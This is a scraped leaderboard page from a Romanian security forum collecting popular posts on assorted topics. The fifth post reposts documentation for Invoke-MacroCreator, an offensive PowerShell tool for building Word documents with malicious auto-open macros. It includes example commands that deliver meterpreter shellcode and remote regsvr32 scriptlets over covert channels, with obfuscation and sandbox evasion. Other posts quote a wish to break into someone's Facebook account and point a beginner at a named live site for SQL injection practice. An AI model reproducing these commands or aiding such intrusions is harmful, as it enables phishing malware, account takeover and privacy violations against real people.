Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 12/16/17 in all areas

  1. Salut, am facut un program care posteaza singur in Grupurile de pe Facebook Sunt 3 fisiere : 1. grupuri.txt - aici pui link catre grupuri 2. text.txt - aici va fi textul de postat 3. config.txt - momentan aici se pot seta nr de secunde de asteptat intre postari Astept pareri si ce imbunatatiri sa-i adaug. Inca nu e gata, voi pune link de download cand este gata. Si cred ca o sa-l las pe consola momentan, fara interfata.
    1 point
  2. next on rstcenter: "Un strigat disperat de ajutor, TPU, cred ca prietena mea ma inseala Da, asta simt si nu stiu ce sa mai fac, se spun ca fetele fac pe detectivii, dar cand fac eu e si mai si. De la un timp imi pare ciudata, cred ca vorbeste cu altcineva. I-am spus de atatea ori, du-te, iesi afara, nu am nimic impotriva, mergi si cu fostii la cafea daca vrei, nu ma deranjeaza. Dar e un baiat care il suspectez, i-am spus sa stea departe de el, dar de fiecare data cand ii spun face crize, ma ia ca e unul dintre cei mai buni prieteni, ca nu am incredere in ea, ca ea nu poate sa il urasca. Cand mi-a spus asta mi-a rupt parca toata fiinta in doua, am incredere in ea, am toata increderea din lume in ea, dar nu mi se pare normal ca din moment ce e cu mine ea sa il consoleze pe el cand e suparat si chestii de genul, mi-a spus ca i-a plans la telefon recent, pai cum sa nu ma enervez, cum, nu ati reactiona la fel cand ati auzi asta? De fiecare daca cand vorbim pe facebook, in ultimul timp pandesc daca intra ala in timpul conversatiei noastre, ea e activa la conversatie, cand intra ala am observat ca brusc nu imi mai trimite mesaje asa repede si nu mai e asa activa, e distrasa. Cand sunt la munca la fel mai verific, si chiar azi in urma cu cateva minute vorbeam cu ea, era si ala on, a iesit ea ca a spus ca nu se simte bine, in acelasi timp si ala a iesit. Si nu e coincidenta, pentru ca e a 4 a oara cand observ ca ei 2 ies deodata, nu stiu daca vorbesc la telefon sau ceva. Imi tot repeta ca nu am incredere in ea, ceea ce nu e adevarat, dar normal ca mi-e frica sa o pierd si nu vreau sa se intample asta, dar simt, simt ca ma inseala cu el, simt ca vorbeste cu el. Ultimele zile au fost groaznice, si nu stiu ce sa mai fac, pentru ca ea de vorba nu vrea sa stea cu mine despre asta. Nu stiu e sa mai fac, imi provoaca atat de multa durere, ma rupe in bucati mici Singura solutie la care m-am gandit, e sa gasesc pe cineva sa ii sparg fb-u aluia sa ma uit prin mesaje, dar nu am pe cine. TPU, o iubesc atat de mult, dar gandul ca ma inseala ma chinuie atat de tare." nu mai puneti ba rahaturi de astea, ca nevasta-mea e curva sau ca in familia x se spioneaza, gata coaie, suntem noi rstcenter, o ardem aiurea, da da-va-n plm ca avem si noi viata noastra, baietii ti-au zis in esenta ce sa faci, sa monitorizezi traficul de net. nu stii sa faci? platesti sau inveti singur.
    1 point
  3. Stiu. Asta se intampla doar la linkurile catre Altex. Este o idiotenie la mijloc. Altex foloseste un third party pentru afiliere, iar acel third party este blocat de AdBlock. Cica ar fi in discutii cu cei de la AdBlock ca sa-l deblocheze, dar nu se stie inca nimic. Problema este ca cei de la Altex nu prea-si dau interesul in ceea ce priveste site-ul si intreaga platforma (site + afiliere). Urmeaza un upload major in care voi include si niste warninguri legate de AdBlock..altceva nu prea am ce face. Merci frumos pentru feedback.
    1 point
  4. 1 point
  5. Macro Creator Author: Arno0x0x - @Arno0x0x Invoke-MacroCreator is a powershell Cmdlet that allows for the creation of an MS-Word document embedding a VBA macro with various payload delivery and execution capabilities. Description Basically the script supports three types of payload that you MUST specify using the -t argument: shellcode: any raw shellcode (for instance created with msfvenom). The shellcode is loaded into memory then loaded into the MS-Word process space and executed. file: any type of file (executable, script, whatever...). The file is first saved to a local temporary directory then called thanks to a command line specified as an argument. command: any command line to be executed In either case, the payload itself must be a file (even a command type payload should be in a file). The file is specified using the -i argument. Those payloads can be delivered through several delivery methods that you MUST specify using the -d argument: body: the payload is embedded into the body of the MS-Word document in an encoded form. This comes with a limit in terms of size of file that can be embedded. comment: the payload is embedded into the comment of the MS-Word document in a base64 encoded form. This technique is inspired by Invoke-Commentator. webdav: the payload is downloaded over a specific WebDAV covert channel (PROPFIND only) and requires a tool at the server side counter part: WebDavDelivery. The process seen performing network traffic is 'svchost.exe'. biblio: aka "Bibliograpy sources". The payload is embedded in a bibliography sources XML file and then loaded over HTTP(S). The generated 'sources.xml' file must be hosted on a web server. The process seen performing network traffic is 'word.exe'. html (using IE): the payload is embedded into a simple HTML file and then downloaded over HTTP(S) from an Internet Explorer COM object. The generated 'index.html' file must be hosted on a web server. The process seen performing network traffic is 'iexplorer.exe' dns : the payload is downloaded over a DNS request covert channel, in several chunks that are reassembled in memory. It is required to own a domain name and to use the DNSDelivery tool. When using DNSDelivery with Invoke-MacroCreator, the type of payload to deliver doesn't matter as it is not consummed by the macro. In other words: set it to whatever you want. If the payload type is a file, use the -c option to define how the file should be called or executed. If the delivery method is webdav, biblio or html, you can set the UNC/URL to use with the -url option. If you don't set this UNC/URL, the default parameters defined in the script's global variables section are used. If the delivery method is dns, use the -dn option to set the domain name to be used. If you don't set this domain name, the default one defined in the script's global variables section is used. When a command is to be executed (file or cmd payload), three different execution methods are available that can be choosen using the -m switch. [Optionnal] Using the optionnal -o switch, some level of obfuscation is applied on parts of the macro. Obfuscation is applied on: Variable names (in the template files, all variable surrounded by '_'. ex: _varName_) Function names (in the template files, all functions surrounded by '#'. ex: #FunctionName#) All string parameters (in the template files, all strings surrounded by '-'. ex: -"any string"-) [Optionnal] Using the optionnal -e switch, some sandbox evasion technique can also be included. If a sandbox is being detected, the payload is not executed and the macro stops. [Optionnal] Using the optionnal -a switch, auto open functions are added so that the macro is executed automatically when the document is opened. This is what you want for an "effective" attack, but probably not for testing/debugging purposes. Dependencies Invoke-MacroCreator requires a proper installation of Microsoft Word. Examples: Here are some sample examples: Shellcode embedded in the body of the MS-Word document, no obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body Shellcode delivered over WebDAV covert channel, with obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o Scriptlet delivered over bibliography source covert channel, with obfuscation, with sandbox evasion: C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e Executable delivered over WebDAV covert channel, using default UNC, no obfuscation, with sandbox evasion, using execution method 3: C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3 Command line embedded in the body of the MS-Word document, with obfuscation, no sandbox evasion, using execution method 1: C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1 Shellcode embedded in a comment of the MS-Word document, no obfuscation, no sandbox evasion, adding auto-open functions: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a Shellcode delivered over the DNS delivery covert channel using domain "mydomain.com", with obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o Download: Invoke-MacroCreator.ps1 MacroCreatorTemplates.ps1 Source: https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
    1 point
  6. Cand am avut cele mai corecte alegeri din istorie dar nu ne convine rezultatul. Csf, ncsf.
    1 point
  7. Presupun ca e vorba de Windows ca OS. In acest caz poti incerca Null-modem emulator sau unofficial windows build of socat
    1 point
  8. mult mai usor este in .htaccess siti faci o lista cu cele pe care vrei redirectionate! RewriteEngine On RewriteCond %{HTTP_HOST} !hostname.com$ [NC] RewriteRule ^(.*)$ http://www.google.com/$1 [L,R=301]
    1 point
  9. Parteneriatele Ripple si banci nu prea functioneaza cum crede lumea din cate m-am documentat. Ripple ca si companie ofera tehnologia din spatele blockchain-ului lor bancilor pentru a face settlement mai rapid si mai in siguranta. Asta nu seamna ca bancile se apuca si cumpara tokenul public XRP si il folosesc. Dupa parerea mea cresterea asta XRP e doar hype cum a mai fost si in trecut, pump and dump. Poate gresesc pentru ca nu am facut mult research pe asta dar as zice sa aveti grija cu XRP.
    1 point
  10. In sfarsit! Asteptam de mult asta.Stiam eu ca nu am votat degeaba cu ei.
    1 point
  11. Salutare, aveti aici o lista cu diverse tutoriale pe Udemy cu cod de reducere, deci sunt gratis.Poate pe unii din voi va ajuta la ceva.Spor! https://justpaste.it/1c5r5
    1 point
  12. @robert2alin in continuare la https://rstforums.com/forum/topic/107079-iphone-8-blacklist/?do=findComment&comment=655986 asta am rezolvat. Spor!
    1 point
  13. cum pot transforma si eu creditul de pe mobil ,in bitcoin,,ma poate indruma cineva spre acest lucru..... va multumesc,
    -1 points
  14. salut eu sunt incepator , un prieten a zis sa ma antrenez in sql incercand sa gasesc si sa exploatez vulnerabilitatile , el a zis sa fac wp import si sa incep de aici http://www.satrabenz.com/login?_RETURN=http%3A%2F%2Fwww.satrabenz.com%2Fcontul_meu dar nu inteleg ? site-ul nici nu cred ca e wordpress atunci cum a facut wp import ? si mi-a dat o poza din titlu cred ca e fake https://imgur.com/a/owMnJ dar nush nu ma pricep imi ziceti voi parerea , se poate sa ma ajutati sa invat ? scz totus ca aceasta postare este off-topic
    -1 points
  15. Salutare am un iPhone 8 care e băgat in blacklist și blocat intr o rețea din Anglia. Cum îl pot debloca?
    -1 points
  16. Nu ar fi posibil sa caut si aplicatia/iile respective pe telefon?
    -1 points
  17. Salutari, Sper ca titlul si-a facut treaba, intrucat nu stiu sa fiu mai precis ca si titlu. Am sa descriu situatia cu care ma confrunt, cat de bine voi putea, in spranta ca ma veti putea ajuta. In primul rand, nu este vorba despre mine personal ci despre familia unei persoane apropiate mie. Parintii acesteia sunt divortati si locuiesc separat, iar copii stau cu mama. Ocazional, acestia isi viziteaza si tatal. Intr-una din astfel de vizite, unul dintre copii a auzit de pe telefonul tatalui vocea mamei si a bunicii sale, dupa care tatal repede si-a bagat castile. Copilul in cazua are un telefon din partea tatalui. Cu mai multe ocazii, cand se discuta despre persoana lui (tatalui), la scurt timp mama primea un mesaj/apel de la acesta referitor la discutia respectiva. Eu unul nu exclud nici existenta unor alte dispozitive de ascultare, dar tind sa cred ca este vorba mai mult despre ceva instalat fizic/software in telefon. Puteti va rog sa ma indrumati inspre a alfa intr-adevar daca acesta ii spioneaza activ? Daca se va descoperi ca asta face cu adevarat, mama este dispusa sa-l dea chiar in judecata. Dar are nevoie de dovezi pentru asta. Situatia este chiar serioasa. Cum as putea depista asa ceva? Daca aveti nevoie de mai multe informatii, just ask for them. Multumesc.
    -1 points
×
×
  • Create New...